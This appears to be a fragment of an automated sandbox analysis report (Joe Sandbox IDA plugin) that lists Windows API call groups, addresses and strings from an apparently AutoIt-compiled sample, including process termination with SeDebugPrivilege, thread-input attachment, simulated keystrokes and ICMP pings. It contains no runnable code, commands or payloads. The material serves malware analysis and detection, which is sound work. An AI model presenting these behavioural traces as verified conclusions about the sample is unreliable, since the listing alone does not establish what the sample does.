                                                    • __gmtime64_s.LIBCMT ref: 00676F2A
                                                    • __allrem.LIBCMT ref: 00676F80
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00676F9C
                                                    • __allrem.LIBCMT ref: 00676FB3
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00676FD1
                                                    • __allrem.LIBCMT ref: 00676FE8
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00677006
                                                    • __invoke_watson.LIBCMT ref: 00677077
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                    • String ID:
                                                    • API String ID: 384356119-0
                                                    APIs
                                                    • _memset.LIBCMT ref: 006B2542
                                                    • GetMenuItemInfoW.USER32(00715890,000000FF,00000000,00000030), ref: 006B25A3
                                                    • SetMenuItemInfoW.USER32(00715890,00000004,00000000,00000030), ref: 006B25D9
                                                    • Sleep.KERNEL32(000001F4), ref: 006B25EB
                                                    • GetMenuItemCount.USER32(?), ref: 006B262F
                                                    • GetMenuItemID.USER32(?,00000000), ref: 006B264B
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 006B2675
                                                    • GetMenuItemID.USER32(?,?), ref: 006B26BA
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 006B2700
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B2714
                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B2735
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                    • String ID:
                                                    • API String ID: 4176008265-0
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 006A6BBF
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 006A6C18
                                                    • VariantInit.OLEAUT32(?), ref: 006A6C2A
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 006A6C4A
                                                    • VariantCopy.OLEAUT32(?,?), ref: 006A6C9D
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 006A6CB1
                                                    • VariantClear.OLEAUT32(?), ref: 006A6CC6
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 006A6CD3
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006A6CDC
                                                    • VariantClear.OLEAUT32(?), ref: 006A6CEE
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 006A6CF9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    APIs
                                                    • IsWindow.USER32(00E15768), ref: 006DB3EB
                                                    • IsWindowEnabled.USER32(00E15768), ref: 006DB3F7
                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 006DB4DB
                                                    • SendMessageW.USER32(00E15768,000000B0,?,?), ref: 006DB512
                                                    • IsDlgButtonChecked.USER32(?,?), ref: 006DB54F
                                                    • GetWindowLongW.USER32(00E15768,000000EC), ref: 006DB571
                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 006DB589
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                    • String ID: @U=u$hW
                                                    • API String ID: 4072528602-4076565667
                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00652EAE
                                                      • Part of subcall function 00651DB3: GetClientRect.USER32(?,?), ref: 00651DDC
                                                      • Part of subcall function 00651DB3: GetWindowRect.USER32(?,?), ref: 00651E1D
                                                      • Part of subcall function 00651DB3: ScreenToClient.USER32(?,?), ref: 00651E45
                                                    • GetDC.USER32 ref: 0068CD32
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0068CD45
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0068CD53
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0068CD68
                                                    • ReleaseDC.USER32(?,00000000), ref: 0068CD70
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0068CDFB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                    • String ID: @U=u$U
                                                    • API String ID: 4009187628-4110099822
                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?), ref: 006C5793
                                                    • inet_addr.WSOCK32(?,?,?), ref: 006C57D8
                                                    • gethostbyname.WSOCK32(?), ref: 006C57E4
                                                    • IcmpCreateFile.IPHLPAPI ref: 006C57F2
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 006C5862
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 006C5878
                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 006C58ED
                                                    • WSACleanup.WSOCK32 ref: 006C58F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    APIs
                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006D62EC
                                                    • GetWindowLongW.USER32(00E15768,000000F0), ref: 006D631F
                                                    • GetWindowLongW.USER32(00E15768,000000F0), ref: 006D6354
                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 006D6386
                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006D63B0
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 006D63C1
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006D63DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID: @U=u$hW
                                                    • API String ID: 2178440468-4076565667
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 006BB4D0
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 006BB546
                                                    • GetLastError.KERNEL32 ref: 006BB550
                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 006BB5BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 006D61EB
                                                    • GetDC.USER32(00000000), ref: 006D61F3
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006D61FE
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 006D620A
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 006D6246
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006D6257
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,006D902A,?,?,000000FF,00000000,?,000000FF,?), ref: 006D6291
                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006D62B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID: @U=u
                                                    • API String ID: 3864802216-2594219639
                                                    APIs
                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 006B7A6C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ArraySafeVartype
                                                    • String ID:
                                                    • API String ID: 1725837607-0
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 006B11F0
                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,006B0268,?,00000001), ref: 006B1204
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 006B120B
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006B0268,?,00000001), ref: 006B121A
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 006B122C
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006B0268,?,00000001), ref: 006B1245
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,006B0268,?,00000001), ref: 006B1257
                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,006B0268,?,00000001), ref: 006B129C
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006B0268,?,00000001), ref: 006B12B1
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,006B0268,?,00000001), ref: 006B12BC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    • API String ID: 2156557900-0
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0065FAA6
                                                    • OleUninitialize.OLE32(?,00000000), ref: 0065FB45
                                                    • UnregisterHotKey.USER32(?), ref: 0065FC9C
                                                    • DestroyWindow.USER32(?), ref: 006945D6
                                                    • FreeLibrary.KERNEL32(?), ref: 0069463B
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00694668
                                                    Strings
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: Variant$ClearInit$_memset
                                                    • String ID: ,,n$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 2862541840-2400968246
                                                    APIs
                                                    • EnumChildWindows.USER32(?,006AA439), ref: 006AA377
                                                    Strings
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 3555792229-1603158881
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 006D6E24
                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 006D6E38
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006D6E52
                                                    • _wcscat.LIBCMT ref: 006D6EAD
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 006D6EC4
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 006D6EF2
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat
                                                    • String ID: @U=u$SysListView32
                                                    • API String ID: 307300125-1908207174
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,006DF910), ref: 006C8D28
                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,006DF910), ref: 006C8D5C
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006C8ED6
                                                    • SysFreeString.OLEAUT32(?), ref: 006C8F00
                                                    Similarity
                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                    • String ID:
                                                    • API String ID: 560350794-0
                                                    APIs
                                                    • _memset.LIBCMT ref: 006CF6B5
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006CF848
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006CF86C
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006CF8AC
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006CF8CE
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006CFA4A
                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006CFA7C
                                                    • CloseHandle.KERNEL32(?), ref: 006CFAAB
                                                    • CloseHandle.KERNEL32(?), ref: 006CFB22
                                                    Similarity
                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                    • String ID:
                                                    • API String ID: 4090791747-0
                                                    APIs
                                                      • Part of subcall function 006B466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006B3697,?), ref: 006B468B
                                                      • Part of subcall function 006B466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006B3697,?), ref: 006B46A4
                                                      • Part of subcall function 006B4A31: GetFileAttributesW.KERNEL32(?,006B370B), ref: 006B4A32
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 006B4D40
                                                    • _wcscmp.LIBCMT ref: 006B4D5A
                                                    • MoveFileW.KERNEL32(?,?), ref: 006B4D75
                                                    Similarity
                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                    • String ID:
                                                    • API String ID: 793581249-0
                                                    APIs
                                                      • Part of subcall function 006AA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 006AA84C
                                                      • Part of subcall function 006AA82C: GetCurrentThreadId.KERNEL32 ref: 006AA853
                                                      • Part of subcall function 006AA82C: AttachThreadInput.USER32(00000000,?,006A9683,?,00000001), ref: 006AA85A
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 006A968E
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006A96AB
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006A96AE
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 006A96B7
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006A96D5
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006A96D8
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 006A96E1
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006A96F8
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006A96FB
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,006A853C,00000B00,?,?), ref: 006A892A
                                                    • HeapAlloc.KERNEL32(00000000,?,006A853C,00000B00,?,?), ref: 006A8931
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006A853C,00000B00,?,?), ref: 006A8946
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,006A853C,00000B00,?,?), ref: 006A894E
                                                    • DuplicateHandle.KERNEL32(00000000,?,006A853C,00000B00,?,?), ref: 006A8951
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,006A853C,00000B00,?,?), ref: 006A8961
                                                    • GetCurrentProcess.KERNEL32(006A853C,00000000,?,006A853C,00000B00,?,?), ref: 006A8969
                                                    • DuplicateHandle.KERNEL32(00000000,?,006A853C,00000B00,?,?), ref: 006A896C
                                                    • CreateThread.KERNEL32(00000000,00000000,006A8992,00000000,00000000,00000000), ref: 006A8986
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    APIs
                                                      • Part of subcall function 006A710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?,?,?,006A7455), ref: 006A7127
                                                      • Part of subcall function 006A710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?,?), ref: 006A7142
                                                      • Part of subcall function 006A710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?,?), ref: 006A7150
                                                      • Part of subcall function 006A710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A7044,80070057,?), ref: 006A7160
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 006C9806
                                                    • _memset.LIBCMT ref: 006C9813
                                                    • _memset.LIBCMT ref: 006C9956
                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 006C9982
                                                    • CoTaskMemFree.OLE32(?), ref: 006C998D
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 006C99DB
                                                    Similarity
                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 1300414916-2785691316
                                                    APIs
                                                      • Part of subcall function 006B3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 006B3C7A
                                                      • Part of subcall function 006B3C55: Process32FirstW.KERNEL32(00000000,?), ref: 006B3C88
                                                      • Part of subcall function 006B3C55: CloseHandle.KERNEL32(00000000), ref: 006B3D52
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006CE9A4
                                                    • GetLastError.KERNEL32 ref: 006CE9B7
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006CE9E6
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 006CEA63
                                                    • GetLastError.KERNEL32(00000000), ref: 006CEA6E
                                                    • CloseHandle.KERNEL32(00000000), ref: 006CEAA3
                                                    Strings
                                                    Similarity
                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 2533919879-2896544425
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @U=u$hW
                                                    • API String ID: 0-4076565667
                                                    APIs
                                                    • ShowWindow.USER32(007157B0,00000000,00E15768,?,?,007157B0,?,006DB5A8,?,?), ref: 006DB712
                                                    • EnableWindow.USER32(00000000,00000000), ref: 006DB736
                                                    • ShowWindow.USER32(007157B0,00000000,00E15768,?,?,007157B0,?,006DB5A8,?,?), ref: 006DB796
                                                    • ShowWindow.USER32(00000000,00000004,?,006DB5A8,?,?), ref: 006DB7A8
                                                    • EnableWindow.USER32(00000000,00000001), ref: 006DB7CC
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 006DB7EF
                                                    Strings
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID: @U=u
                                                    • API String ID: 642888154-2594219639
                                                    APIs
                                                    • _memset.LIBCMT ref: 006D72AA
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006D7351
                                                    • IsMenu.USER32(?), ref: 006D7369
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006D73B1
                                                    • DrawMenuBar.USER32 ref: 006D73C4
                                                    Strings
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                    • String ID: 0$hW
                                                    • API String ID: 3866635326-580508736
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 006B3033
                                                    Strings
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 006B4312
                                                    • LoadStringW.USER32(00000000), ref: 006B4319
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 006B432F
                                                    • LoadStringW.USER32(00000000), ref: 006B4336
                                                    • _wprintf.LIBCMT ref: 006B435C
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006B437A
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 006B4357
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    APIs
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0068C1C7,00000004,00000000,00000000,00000000), ref: 00652ACF
                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0068C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00652B17
                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0068C1C7,00000004,00000000,00000000,00000000), ref: 0068C21A
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0068C1C7,00000004,00000000,00000000,00000000), ref: 0068C286
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 006B70DD
                                                      • Part of subcall function 00670DB6: std::exception::exception.LIBCMT ref: 00670DEC
                                                      • Part of subcall function 00670DB6: __CxxThrowException@8.LIBCMT ref: 00670E01
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006B7114
                                                    • EnterCriticalSection.KERNEL32(?), ref: 006B7130
                                                    • _memmove.LIBCMT ref: 006B717E
                                                    • _memmove.LIBCMT ref: 006B719B
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 006B71AA
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006B71BF
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 006B71DE
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 256516436-0
                                                    APIs
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                      • Part of subcall function 0066FC86: _wcscpy.LIBCMT ref: 0066FCA9
                                                    • _wcstok.LIBCMT ref: 006BEC94
                                                    • _wcscpy.LIBCMT ref: 006BED23
                                                    • _memset.LIBCMT ref: 006BED56
                                                    Strings
